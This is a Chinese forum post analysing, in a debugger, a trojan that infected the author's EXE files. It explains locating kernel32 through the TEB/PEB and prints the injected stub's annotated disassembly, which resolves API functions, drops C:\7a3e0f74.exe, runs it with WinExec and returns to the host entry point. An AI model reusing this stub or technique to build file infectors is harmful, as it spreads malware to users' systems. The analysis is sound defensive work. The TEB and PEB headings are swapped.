OD 分析全盘EXE感染型木马病毒,小红伞报 TR/Crypt.XPACK.Gen
前段时间不小心运行了一个加壳工具,结果除系统盘外几乎所有的EXE文件全被感染了……记得几年前感染过一次,也是除系统盘以外的所有EXE感染,但几年前被感染后的EXE文件只要在虚拟机里运行一次,就会恢复出非感染文件,所以那次感染之后,需用到的程序中EXE文件,先在虚拟机里运行后再复制过来覆盖就可以,实际上那次感染后的至今没修复完,因有些工具不常用了。这次感染的感觉和上次不一样,实际上找修复工具也是空谈了,经常也是杀光光,所以下定决心亲自分析下并打算写个修复工具……目标文件,本机已经被感染OD工具目录中的 loaddll_木马.exe ,其它不多说直接入正题。
在分析这个被感染的文件之前先了解和学习下如何利用 PEB 查找 kener32 地址,学习这个还要了解下 TEB 结构。 首先,我们先来认识下什么是 PEB 和 TEB:
PEB 是 Process Environment Block 的缩写,也就是进程环境块; TEB 是 Thread Environment Block 的缩写,也就是线程环境块。我们先来看下几个结构体。
PEB结构:
//
// Thread Environment Block (TEB)
//
typedef struct _TEB
{
NT_TIB Tib; /* 00h */
PVOID EnvironmentPointer; /* 1Ch */
CLIENT_ID Cid; /* 20h */
PVOID ActiveRpcHandle; /* 28h */
PVOID ThreadLocalStoragePointer; /* 2Ch */
struct _PEB *ProcessEnvironmentBlock; /* 30h */
ULONG LastErrorValue; /* 34h */
ULONG CountOfOwnedCriticalSections; /* 38h */
PVOID CsrClientThread; /* 3Ch */
struct _W32THREAD* Win32ThreadInfo; /* 40h */
ULONG User32Reserved; /* 44h */
ULONG UserReserved; /* ACh */
PVOID WOW32Reserved; /* C0h */
LCID CurrentLocale; /* C4h */
ULONG FpSoftwareStatusRegister; /* C8h */
PVOID SystemReserved1; /* CCh */
LONG ExceptionCode; /* 1A4h */
struct _ACTIVATION_CONTEXT_STACK *ActivationContextStackPointer; /* 1A8h */
UCHAR SpareBytes1; /* 1ACh */
GDI_TEB_BATCH GdiTebBatch; /* 1D4h */
CLIENT_ID RealClientId; /* 6B4h */
PVOID GdiCachedProcessHandle; /* 6BCh */
ULONG GdiClientPID; /* 6C0h */
ULONG GdiClientTID; /* 6C4h */
PVOID GdiThreadLocalInfo; /* 6C8h */
ULONG Win32ClientInfo; /* 6CCh */
PVOID glDispatchTable; /* 7C4h */
ULONG glReserved1; /* B68h */
PVOID glReserved2; /* BDCh */
PVOID glSectionInfo; /* BE0h */
PVOID glSection; /* BE4h */
PVOID glTable; /* BE8h */
PVOID glCurrentRC; /* BECh */
PVOID glContext; /* BF0h */
NTSTATUS LastStatusValue; /* BF4h */
UNICODE_STRING StaticUnicodeString; /* BF8h */
WCHAR StaticUnicodeBuffer; /* C00h */
PVOID DeallocationStack; /* E0Ch */
PVOID TlsSlots; /* E10h */
LIST_ENTRY TlsLinks; /* F10h */
PVOID Vdm; /* F18h */
PVOID ReservedForNtRpc; /* F1Ch */
PVOID DbgSsReserved; /* F20h */
ULONG HardErrorDisabled; /* F28h */
PVOID Instrumentation; /* F2Ch */
PVOID SubProcessTag; /* F64h */
PVOID EtwTraceData; /* F68h */
PVOID WinSockData; /* F6Ch */
ULONG GdiBatchCount; /* F70h */
BOOLEAN InDbgPrint; /* F74h */
BOOLEAN FreeStackOnTermination; /* F75h */
BOOLEAN HasFiberData; /* F76h */
UCHAR IdealProcessor; /* F77h */
ULONG GuaranteedStackBytes; /* F78h */
PVOID ReservedForPerf; /* F7Ch */
PVOID ReservedForOle; /* F80h */
ULONG WaitingOnLoaderLock; /* F84h */
ULONG SparePointer1; /* F88h */
ULONG SoftPatchPtr1; /* F8Ch */
ULONG SoftPatchPtr2; /* F90h */
PVOID *TlsExpansionSlots; /* F94h */
ULONG ImpersionationLocale; /* F98h */
ULONG IsImpersonating; /* F9Ch */
PVOID NlsCache; /* FA0h */
PVOID pShimData; /* FA4h */
ULONG HeapVirualAffinity; /* FA8h */
PVOID CurrentTransactionHandle; /* FACh */
PTEB_ACTIVE_FRAME ActiveFrame; /* FB0h */
PVOID FlsData; /* FB4h */
UCHAR SafeThunkCall; /* FB8h */
UCHAR BooleanSpare; /* FB9h */
} TEB, *PTEB;
TEB结构:
typedef struct _PEB
{
UCHAR InheritedAddressSpace; // 00h
UCHAR ReadImageFileExecOptions; // 01h
UCHAR BeingDebugged; // 02h
UCHAR Spare; // 03h
PVOID Mutant; // 04h
PVOID ImageBaseAddress; // 08h
PPEB_LDR_DATA Ldr; // 0Ch
PRTL_USER_PROCESS_PARAMETERS ProcessParameters; // 10h
PVOID SubSystemData; // 14h
PVOID ProcessHeap; // 18h
PVOID FastPebLock; // 1Ch
PPEBLOCKROUTINE FastPebLockRoutine; // 20h
PPEBLOCKROUTINE FastPebUnlockRoutine; // 24h
ULONG EnvironmentUpdateCount; // 28h
PVOID* KernelCallbackTable; // 2Ch
PVOID EventLogSection; // 30h
PVOID EventLog; // 34h
PPEB_FREE_BLOCK FreeList; // 38h
ULONG TlsExpansionCounter; // 3Ch
PVOID TlsBitmap; // 40h
ULONG TlsBitmapBits; // 44h
PVOID ReadOnlySharedMemoryBase; // 4Ch
PVOID ReadOnlySharedMemoryHeap; // 50h
PVOID* ReadOnlyStaticServerData; // 54h
PVOID AnsiCodePageData; // 58h
PVOID OemCodePageData; // 5Ch
PVOID UnicodeCaseTableData; // 60h
ULONG NumberOfProcessors; // 64h
ULONG NtGlobalFlag; // 68h
UCHAR Spare2; // 6Ch
LARGE_INTEGER CriticalSectionTimeout; // 70h
ULONG HeapSegmentReserve; // 78h
ULONG HeapSegmentCommit; // 7Ch
ULONG HeapDeCommitTotalFreeThreshold; // 80h
ULONG HeapDeCommitFreeBlockThreshold; // 84h
ULONG NumberOfHeaps; // 88h
ULONG MaximumNumberOfHeaps; // 8Ch
PVOID** ProcessHeaps; // 90h
PVOID GdiSharedHandleTable; // 94h
PVOID ProcessStarterHelper; // 98h
PVOID GdiDCAttributeList; // 9Ch
PVOID LoaderLock; // A0h
ULONG OSMajorVersion; // A4h
ULONG OSMinorVersion; // A8h
ULONG OSBuildNumber; // ACh
ULONG OSPlatformId; // B0h
ULONG ImageSubSystem; // B4h
ULONG ImageSubSystemMajorVersion; // B8h
ULONG ImageSubSystemMinorVersion; // C0h
ULONG GdiHandleBuffer; // C4h
PVOID ProcessWindowStation; // ???
} PEB, *PPEB;
PEB_LDR_DATA结构:
typedef struct _PEB_LDR_DATA
{
ULONG Length; // +0x00
BOOLEAN Initialized; // +0x04
PVOID SsHandle; // +0x08
LIST_ENTRY InLoadOrderModuleList; // +0x0c
LIST_ENTRY InMemoryOrderModuleList; // +0x14
LIST_ENTRY InInitializationOrderModuleList;// +0x1c
} PEB_LDR_DATA,*PPEB_LDR_DATA; // +0x24
LIST_ENTRY结构:
typedef struct _LIST_ENTRY {
struct _LIST_ENTRY *Flink;
struct _LIST_ENTRY *Blink;
} LIST_ENTRY, *PLIST_ENTRY, *RESTRICTED_POINTER PRLIST_ENTRY;
根据上面的了解,获取kernel32.dll的基地址原理为:在NT内核系统中fs寄存器指向TEB结构,TEB+0x30处指向PEB结构,PEB+0x0c处指向PEB_LDR_DATA结构,PEB_LDR_DATA+0x1c处存放一些动态链接库地址,第一个指向ntdl.dll,第二个就是kernel32.dll的基地址了。在反汇编中如下:
MOV EAX,DWORD PTR FS: ; FS指向TEB结构体内存地址,0x30处是PEB(Process Environment Block)的结构地址
MOV EAX,DWORD PTR DS: ; EAX==00081E90-->PEB_LDR_DATA 的基址
MOV EAX,DWORD PTR DS: ; EAX==00081F28 --> InInitializationOrderModuleList 进程当前已加载模块的链表
MOV EAX,DWORD PTR DS: ; EAX==00081FD0 --> Flink地址
MOV EAX,DWORD PTR DS: ; 变量赋值:EAX==7C800000 --> kernel32.dll的基址
知识点:以后在反汇编代码中看到类似 MOV EAX,DWORD PTR FS: 的汇编代码一定 TEB 和 PEB 有关的,记住后就方便分析了。
其次,我们现在来分析被感染的loaddll_木马.exe,OD截入目标文件,如图所示:
00460000 >55 PUSH EBP ; OD载入后被感染程序停留在了新增加的代码入口处
00460001 8BEC MOV EBP,ESP
00460003 81EC 84000000 SUB ESP,0x84
00460009 8365 EC 00 AND DWORD PTR SS:,0x0
0046000D 8365 B0 00 AND DWORD PTR SS:,0x0
00460011 8365 E0 00 AND DWORD PTR SS:,0x0
00460015 8365 F0 00 AND DWORD PTR SS:,0x0
00460019 8365 FC 00 AND DWORD PTR SS:,0x0
0046001D E8 00000000 CALL 00460022 ; 注意这里,如果直接F8单步木马文件就会生成并开始感染,所以F7进入。
00460022 58 POP EAX
00460023 05 90020000 ADD EAX,0x290 ; EAX=00460022 再加上0x290得到004602B2,CALL 00460022 地址尾 RETN地址
00460028 8945 E8 MOV DWORD PTR SS:,EAX ; 变量赋值:=004602B2
0046002B 64:A1 30000000MOV EAX,DWORD PTR FS: ; FS指向TEB结构体内存地址,0x30处是PEB(Process Environment Block)的结构地址
00460031 8945 D8 MOV DWORD PTR SS:,EAX ; 变量赋值:=7FFDE000
00460034 C745 C4 433A5C3>MOV DWORD PTR SS:,0x375C3A43 ; 常量赋值:=0x375C3A43 开始在地址0006FF84生成一个C盘根目录下名为7a3e0f74.exe的路径
0046003B C745 C8 6133653>MOV DWORD PTR SS:,0x30653361 ; 常量赋值:=0x30653361
00460042 C745 CC 6637342>MOV DWORD PTR SS:,0x2E343766 ; 常量赋值:=0x2E343766
00460049 C745 D0 6578650>MOV DWORD PTR SS:,0x657865 ; 常量赋值:=0x657865;="C:\7a3e0f74.exe"
00460050 8B45 D8 MOV EAX,DWORD PTR SS: ; 变量赋值:EAX==7FFDE000-->PEB结构地址
00460053 8B40 0C MOV EAX,DWORD PTR DS: ; EAX==00081E90-->PEB_LDR_DATA 的基址
00460056 8B40 1C MOV EAX,DWORD PTR DS: ; EAX==00081F28 --> InInitializationOrderModuleList 进程当前已加载模块的链表
00460059 8B00 MOV EAX,DWORD PTR DS: ; EAX==00081FD0 --> Flink地址
0046005B 8945 E4 MOV DWORD PTR SS:,EAX ; 变量赋值:=00081FD0 --> Flink地址
0046005E 8B45 E4 MOV EAX,DWORD PTR SS: ; 变量赋值:EAX==00081FD0 --> Flink地址
00460061 8B40 08 MOV EAX,DWORD PTR DS: ; 变量赋值:EAX==7C800000 --> kernel32.dll的基址
00460064 8945 F4 MOV DWORD PTR SS:,EAX ; 变量赋值:=7C800000 --> kernel32.dll的基址
00460067 8B45 E8 MOV EAX,DWORD PTR SS: ; EAX==004602B2 -->取函数尾地址
0046006A C700 83C404E9 MOV DWORD PTR DS:,0xE904C483 ; ==0xE904C483 --> 在此函数RETN地址处开始写入8字节,以便在执行完木马代码段跳转到非感染程序入口
00460070 8B45 E8 MOV EAX,DWORD PTR SS: ; EAX==004602B2 -->取函数尾地址
00460073 C740 04 B6FDFAF>MOV DWORD PTR DS:,0xFFFAFDB6 ; ==0xFFFAFDB6 --> 在此函数RETN地址+4处写入整数,目的是执行完木马代码段跳转到非感染程序入口处
0046007A 8B45 F4 MOV EAX,DWORD PTR SS: ; EAX==7C800000 --> kernel32.dll地址
0046007D 8B40 3C MOV EAX,DWORD PTR DS: ; EAX==000000F0 --> "PE"偏移量
00460080 8B4D F4 MOV ECX,DWORD PTR SS: ; kernel32.7C800000
00460083 8B55 F4 MOV EDX,DWORD PTR SS: ; kernel32.7C800000
00460086 035401 78 ADD EDX,DWORD PTR DS: ; EDX=7C80262C --> kernel32.7C80262C 输出表地址
0046008A 8955 DC MOV DWORD PTR SS:,EDX ; ntdll.KiFastSystemCallRet
0046008D 8B45 DC MOV EAX,DWORD PTR SS: ; EAX==7C80262C (kernel32.7C80262C)
00460090 8B4D F4 MOV ECX,DWORD PTR SS: ; ECX==7C800000 (kernel32.7C800000)
00460093 0348 1C ADD ECX,DWORD PTR DS: ; ECX=7C802654 (kernel32.7C802654) 未知
00460096 894D BC MOV DWORD PTR SS:,ECX
00460099 8B45 DC MOV EAX,DWORD PTR SS: ; kernel32.7C80262C
0046009C 8B4D F4 MOV ECX,DWORD PTR SS: ; kernel32.7C800000
0046009F 0348 20 ADD ECX,DWORD PTR DS: ; ECX=7C803538 --> 函数地址
004600A2 894D B4 MOV DWORD PTR SS:,ECX
004600A5 8B45 DC MOV EAX,DWORD PTR SS: ; kernel32.7C80262C
004600A8 8B4D F4 MOV ECX,DWORD PTR SS: ; kernel32.7C800000
004600AB 0348 24 ADD ECX,DWORD PTR DS: ; ECX=7C80441C (kernel32.7C80441C) 函数地址尾?
004600AE 894D B8 MOV DWORD PTR SS:,ECX
004600B1 8365 8C 00 AND DWORD PTR SS:,0x0 ; =0
004600B5 EB 07 JMP SHORT 004600BE ; 004600BE
004600B7 8B45 8C MOV EAX,DWORD PTR SS: ; 循环体开始,循环取函数名称
004600BA 40 INC EAX ; 自加1
004600BB 8945 8C MOV DWORD PTR SS:,EAX
004600BE 8B45 DC MOV EAX,DWORD PTR SS: ; i=0 EAX==7C80262C (kernel32.7C80262C)
004600C1 8B4D 8C MOV ECX,DWORD PTR SS:
004600C4 3B48 18 CMP ECX,DWORD PTR DS: ; 当i=0时,ECX和输出表函数个数0x3B9比较,如果ECX<0x3B9,则不跳;如果ECX>0x3B9,则跳转
004600C7 0F83 61010000 JNB 0046022E ; 0046022E
004600CD 8B45 8C MOV EAX,DWORD PTR SS: ; 当i=0时,EAX==0
004600D0 8B4D B8 MOV ECX,DWORD PTR SS: ; kernel32.7C80441C
004600D3 0FB70441 MOVZX EAX,WORD PTR DS: ; 当i=0时,EAX=0
004600D7 8B4D BC MOV ECX,DWORD PTR SS: ; kernel32.7C802654
004600DA 8B55 F4 MOV EDX,DWORD PTR SS: ; kernel32.7C800000
004600DD 031481 ADD EDX,DWORD PTR DS: ; 当i=0时,EDX=7C80A6D4 (kernel32.ActivateActCtx)
004600E0 8955 88 MOV DWORD PTR SS:,EDX ; ntdll.KiFastSystemCallRet
004600E3 8B45 8C MOV EAX,DWORD PTR SS: ; 当i=0时,EAX==0
004600E6 8B4D B4 MOV ECX,DWORD PTR SS: ; kernel32.7C803538
004600E9 8B55 F4 MOV EDX,DWORD PTR SS: ; kernel32.7C800000
004600EC 031481 ADD EDX,DWORD PTR DS: ; 当i=0时,EDX=7C804B9B (kernel32.7C804B9B), ASCII "ActivateActCtx"
004600EF 8955 84 MOV DWORD PTR SS:,EDX ; ntdll.KiFastSystemCallRet
004600F2 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
004600F5 8138 4765744D CMP DWORD PTR DS:,0x4D746547 ; 当i=0时,==69746341 和 0x4D746547比较 ,>0x4D746547 跳转;如果=0x4D746547,则不跳
004600FB 75 6A JNZ SHORT 00460167 ; 00460167
004600FD 8B45 84 MOV EAX,DWORD PTR SS: ; 当i=0x173时,EAX==7C806773 (kernel32.7C806773), ASCII "GetMailslotInfo"
00460100 8178 04 6F64756>CMP DWORD PTR DS:,0x6C75646F ; 当i=0x173时,==736C6961,0x736C6961>0x6C75646F时,则跳实现;=0x6C75646F时,则不跳
00460107 75 5E JNZ SHORT 00460167 ; 00460167
00460109 8B45 84 MOV EAX,DWORD PTR SS: ; 当i=0x174时经过,EAX==7C806783 (kernel32.7C806783), ASCII "GetModuleFileNameA"
0046010C 8178 08 6548616>CMP DWORD PTR DS:,0x6E614865 ; 当i=0x174时,==6C694665,6C694665<0x6E614865时,则跳实现;当i=0x176时,==6E614865=0x6E614865 则不跳
00460113 75 52 JNZ SHORT 00460167 ; 00460167
00460115 8B45 84 MOV EAX,DWORD PTR SS: ; 当i=0x176时,EAX==7C8067A9 (kernel32.7C8067A9), ASCII "GetModuleHandleA"
00460118 8178 0C 646C654>CMP DWORD PTR DS:,0x41656C64 ; 当i=0x176时,不跳
0046011F 75 46 JNZ SHORT 00460167 ; 00460167
00460121 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
00460124 8B40 10 MOV EAX,DWORD PTR DS:
00460127 25 FF000000 AND EAX,0xFF ; 当i=0x176时,EAX=0
0046012C 75 39 JNZ SHORT 00460167 ; 当i=0x176时,未跳??
0046012E 837D EC 00 CMP DWORD PTR SS:,0x0 ; =00000000=0x0,则不跳;第二次大循环时当i=0x176时跳转
00460132 75 2E JNZ SHORT 00460162 ; 00460162
00460134 8B45 88 MOV EAX,DWORD PTR SS: ; kernel32.WriteFile
00460137 8945 EC MOV DWORD PTR SS:,EAX
0046013A C745 90 4B65726>MOV DWORD PTR SS:,0x6E72654B ; 从地址0006FF50开始写入Kernel32.dll名称
00460141 C745 94 656C333>MOV DWORD PTR SS:,0x32336C65
00460148 C745 98 2E646C6>MOV DWORD PTR SS:,0x6C6C642E
0046014F 8365 9C 00 AND DWORD PTR SS:,0x0
00460153 8D45 90 LEA EAX,DWORD PTR SS: ; EAX=0006FF50, (ASCII "Kernel32.dll")
00460156 50 PUSH EAX
00460157 FF55 EC CALL DWORD PTR SS: ; kernel32.GetModuleHandleA
0046015A 8945 F4 MOV DWORD PTR SS:,EAX
0046015D^ E9 18FFFFFF JMP 0046007A ; 0046007A
00460162 E9 A2000000 JMP 00460209 ; 00460209
00460167 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
0046016A 8138 43726561 CMP DWORD PTR DS:,0x61657243 ; 当i=0x173时,==4D746547,0x4D746547<0x61657243,则跳实现
00460170 75 20 JNZ SHORT 00460192 ; 00460192
00460172 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
00460175 8178 04 7465466>CMP DWORD PTR DS:,0x69466574
0046017C 75 14 JNZ SHORT 00460192 ; 00460192
0046017E 8B45 84 MOV EAX,DWORD PTR SS: ; 第二次大循环当i=0x4D时经过,EAX==7C805143 (kernel32.7C805143), ASCII "CreateFiber"
00460181 8178 08 6C65410>CMP DWORD PTR DS:,0x41656C
00460188 75 08 JNZ SHORT 00460192 ; 00460192
0046018A 8B45 88 MOV EAX,DWORD PTR SS: ; 第二次大循环当i=0x4F时经过,EAX==7C801A28 (kernel32.CreateFileA)
0046018D 8945 B0 MOV DWORD PTR SS:,EAX
00460190 EB 77 JMP SHORT 00460209 ; 00460209
00460192 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
00460195 8138 57726974 CMP DWORD PTR DS:,0x74697257 ; 当i=0时,==69746341 < 0x74697257 跳转
0046019B 75 24 JNZ SHORT 004601C1 ; 004601C1
0046019D 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
004601A0 8178 04 6546696>CMP DWORD PTR DS:,0x6C694665
004601A7 75 18 JNZ SHORT 004601C1 ; 004601C1
004601A9 8B45 84 MOV EAX,DWORD PTR SS: ; 第二次大循环当i=0x38F时,EAX==7C808DCB (kernel32.7C808DCB), ASCII "WriteFile"
004601AC 8B40 08 MOV EAX,DWORD PTR DS:
004601AF 25 FFFF0000 AND EAX,0xFFFF
004601B4 83F8 65 CMP EAX,0x65 ; 第二次大循环当i=0x38F时,EAX=0x65,则不跳
004601B7 75 08 JNZ SHORT 004601C1 ; 004601C1
004601B9 8B45 88 MOV EAX,DWORD PTR SS: ; kernel32.WriteFile
004601BC 8945 E0 MOV DWORD PTR SS:,EAX
004601BF EB 48 JMP SHORT 00460209 ; 00460209
004601C1 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
004601C4 8138 436C6F73 CMP DWORD PTR DS:,0x736F6C43 ; 当i=0时,==69746341 < 0x736F6C43 跳转
004601CA 75 20 JNZ SHORT 004601EC ; 004601EC
004601CC 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
004601CF 8178 04 6548616>CMP DWORD PTR DS:,0x6E614865 ; 第二次大循环时经过
004601D6 75 14 JNZ SHORT 004601EC ; 004601EC
004601D8 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
004601DB 8178 08 646C650>CMP DWORD PTR DS:,0x656C64
004601E2 75 08 JNZ SHORT 004601EC ; 004601EC
004601E4 8B45 88 MOV EAX,DWORD PTR SS: ; kernel32.WriteFile
004601E7 8945 F0 MOV DWORD PTR SS:,EAX
004601EA EB 1D JMP SHORT 00460209 ; 00460209
004601EC 8B45 84 MOV EAX,DWORD PTR SS: ; kernel32.7C808DCB
004601EF 8138 57696E45 CMP DWORD PTR DS:,0x456E6957 ; 当i=0时,==69746341 > 0x456E6957 跳转
004601F5 75 12 JNZ SHORT 00460209 ; 00460209
004601F7 8B45 84 MOV EAX,DWORD PTR SS: ; 第二次大循环当i=0x383时,EAX==7C808CD7 (kernel32.7C808CD7), ASCII "WinExec"
004601FA 8178 04 7865630>CMP DWORD PTR DS:,0x636578 ; 第二次大循环当i=0x383时,==00636578 和比较值相等,则不跳
00460201 75 06 JNZ SHORT 00460209 ; 00460209
00460203 8B45 88 MOV EAX,DWORD PTR SS: ; kernel32.WriteFile
00460206 8945 FC MOV DWORD PTR SS:,EAX
00460209 837D EC 00 CMP DWORD PTR SS:,0x0 ; 和0相等时跳转;第二次大循环时,=7C80B731 (kernel32.GetModuleHandleA)
0046020D 74 1A JE SHORT 00460229 ; 00460229
0046020F 837D B0 00 CMP DWORD PTR SS:,0x0 ; 第二次开始循环时,=7C801A28 (kernel32.CreateFileA)
00460213 74 14 JE SHORT 00460229 ; 00460229
00460215 837D E0 00 CMP DWORD PTR SS:,0x0 ; 第二次大循环时,=7C810E17 (kernel32.WriteFile)
00460219 74 0E JE SHORT 00460229 ; 00460229
0046021B 837D F0 00 CMP DWORD PTR SS:,0x0 ; 第二次大循环时,=7C809BD7 (kernel32.CloseHandle)
0046021F 74 08 JE SHORT 00460229 ; 00460229
00460221 837D FC 00 CMP DWORD PTR SS:,0x0 ; 第二次大循环时,当i=0x38F时,=7C8623AD (kernel32.WinExec)
00460225 74 02 JE SHORT 00460229 ; 00460229
00460227 EB 05 JMP SHORT 0046022E ; 0046022E
00460229^ E9 89FEFFFF JMP 004600B7 ; 循环尾
0046022E 6A 00 PUSH 0x0 ; 第二次大循环当i=0x38F时,开始创建木马文件
00460230 68 80000000 PUSH 0x80
00460235 6A 02 PUSH 0x2
00460237 6A 00 PUSH 0x0
00460239 6A 00 PUSH 0x0
0046023B 68 000000C0 PUSH 0xC0000000
00460240 8D45 C4 LEA EAX,DWORD PTR SS: ; EAX=0006FF84, (ASCII "C:\7a3e0f74.exe")
00460243 50 PUSH EAX ; 压栈 EAX=0006FF84, (ASCII "C:\7a3e0f74.exe")
00460244 FF55 B0 CALL DWORD PTR SS: ; kernel32.CreateFileA
00460247 8945 C0 MOV DWORD PTR SS:,EAX ; EAX=00000034
0046024A 837D C0 FF CMP DWORD PTR SS:,-0x1
0046024E 74 61 JE SHORT 004602B1 ; 木马文件 7a3e0f74.exe 创建成功则不跳转
00460250 8B45 E8 MOV EAX,DWORD PTR SS: ; 创建木马文件函数尾地址EAX==004602B2 (loaddll_.004602B2)
00460253 8945 80 MOV DWORD PTR SS:,EAX
00460256 83A5 7CFFFFFF 0>AND DWORD PTR SS:,0x0
0046025D EB 0D JMP SHORT 0046026C ; 0046026C
0046025F 8B85 7CFFFFFF MOV EAX,DWORD PTR SS: ; 循环开始
00460265 40 INC EAX
00460266 8985 7CFFFFFF MOV DWORD PTR SS:,EAX
0046026C 81BD 7CFFFFFF F>CMP DWORD PTR SS:,0x1F4 ; 如果<0x1F4,则不跳转
00460276 7D 39 JGE SHORT 004602B1 ; 004602B1
00460278 8B45 80 MOV EAX,DWORD PTR SS: ; loaddll_.004602BA
0046027B 8138 4D5A9000 CMP DWORD PTR DS:,0x905A4D ; ==E904C483 和 0x905A4D 比较,这里就不多写了,只要相等时就不跳转;当i=8时,==00905A4D和比较值相等,则不跳
00460281 75 25 JNZ SHORT 004602A8 ; 004602A8
00460283 6A 00 PUSH 0x0 ; 这里开始向所创建的木马文件写入数据
00460285 8D45 F8 LEA EAX,DWORD PTR SS: ; EAX=0006FFB8
00460288 50 PUSH EAX
00460289 68 004C0100 PUSH 0x14C00
0046028E FF75 80 PUSH DWORD PTR SS: ; loaddll_.004602BA
00460291 FF75 C0 PUSH DWORD PTR SS: ; 所创建文件句柄0x34
00460294 FF55 E0 CALL DWORD PTR SS: ; kernel32.WriteFile
00460297 FF75 C0 PUSH DWORD PTR SS: ; 木马文件句柄,写入后下面一行关闭句柄
0046029A FF55 F0 CALL DWORD PTR SS: ; kernel32.CloseHandle
0046029D 6A 05 PUSH 0x5 ; 这里开始就一定要注意了,这里就是运行所创建的木马文件,当然我之后是不会执行的,因在实体机里分析
0046029F 8D45 C4 LEA EAX,DWORD PTR SS: ; EAX=0006FF84, (ASCII "C:\7a3e0f74.exe")========>下面的代码就不执行了,不然EXE文件又要被感染了!!!!!!!!!
004602A2 50 PUSH EAX ; 压栈 EAX=0006FF84, (ASCII "C:\7a3e0f74.exe")
004602A3 FF55 FC CALL DWORD PTR SS: ; kernel32.WinExec
004602A6 EB 09 JMP SHORT 004602B1 ; 004602B1
004602A8 8B45 80 MOV EAX,DWORD PTR SS: ; loaddll_.004602BA
004602AB 40 INC EAX
004602AC 8945 80 MOV DWORD PTR SS:,EAX
004602AF^ EB AE JMP SHORT 0046025F ; 0046025F
004602B1 C9 LEAVE
004602B2 83C4 04 ADD ESP,0x4 ; 写入8字节数据,以便木马执行完成跳转到非感染程序入口
004602B5- E9 B6FDFAFF JMP 00410070 ; 00410070
004602BA 4D DEC EBP
004602BB 5A POP EDX ; ntdll.KiFastSystemCallRet
004602BC 90 NOP
004602BD 0003 ADD BYTE PTR DS:,AL
004602BF 0000 ADD BYTE PTR DS:,AL
小结:
1、上面的代码中,先找到kernel32.dll中的函数GetModuleHandleA的地址;
2、再利用 GetModuleHandleA 找到 CreateFileA 、WriteFile 、CloseHandle 和 WinExec 等函数地址。调用CreateFileA 、WriteFile 、CloseHandle 等函数在C盘根目录下生成木马文件 7a3e0f74.exe,如图所示:
最后用 WinExec 函数来运行所生成的木马文件 7a3e0f74.exe ,如图所示:
因这木马病毒文件在运行后文件会自动删除,并执行一些恶意破坏系统的文件,所以上面代码中就不执行004602A3处的代码了。
3、被感染的文件主要作用就是生成一个名为7a3e0f74.exe的木马文件并运行,所以关键部分还是在所生成的文件里,还得分析,另外被感染的文件大小也有所变化。
4、完成上面的工作后,文件跳回到未感染文件的入口,如图所示:
先顶后看~ 消灭0回复
页:
[1]